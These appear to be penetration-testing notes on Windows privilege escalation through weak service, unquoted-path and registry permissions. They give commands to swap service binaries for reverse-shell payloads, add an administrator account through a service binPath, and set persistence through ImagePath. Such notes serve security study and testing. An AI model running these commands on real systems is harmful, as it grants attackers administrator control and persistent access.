Weak Permissions
info
SharpUP can audit for weak ACLs easily in one run.
.\SharpUp.exe audit
Basic Weak Permissions
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
# We can replace this binary with msf's malicious .exe file to get rev shell
# Replace & Start the Service
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService
# Check permissions using AccessChk
accesschk.exe /accepteula -quvcw WindscribeService
# We can change bin path of the service to malicious command
sc config WindscribeService binpath="cmd /c net localgroup administrators rezydev /add"
# Restart the Service
sc stop WindscribeService
sc start WindscribeService
Unquoted Service Path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
If found any path such as C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe, we can try making C:\Program.exe or C:\Program Files (x86)\System.exe with msfvenom to get reverse shell as SYSTEM.
info
We need permission under those directory to be able to copy malicious binaries there.
Permissive Registry ACLs
- We can look for Weak Service ACLs in Registry:
accesschk.exe /accepteula "USER" -kvuqsw hklm\System\CurrentControlSet\services
# Modify ImagePath for persistence:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\TARGET_SERVICE -Name "ImagePath" -Value "C:\path\to\malicious.exe"
- We may also look for Modifiable Autorun Binaries
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
## Note: Potential persistence if write access is available.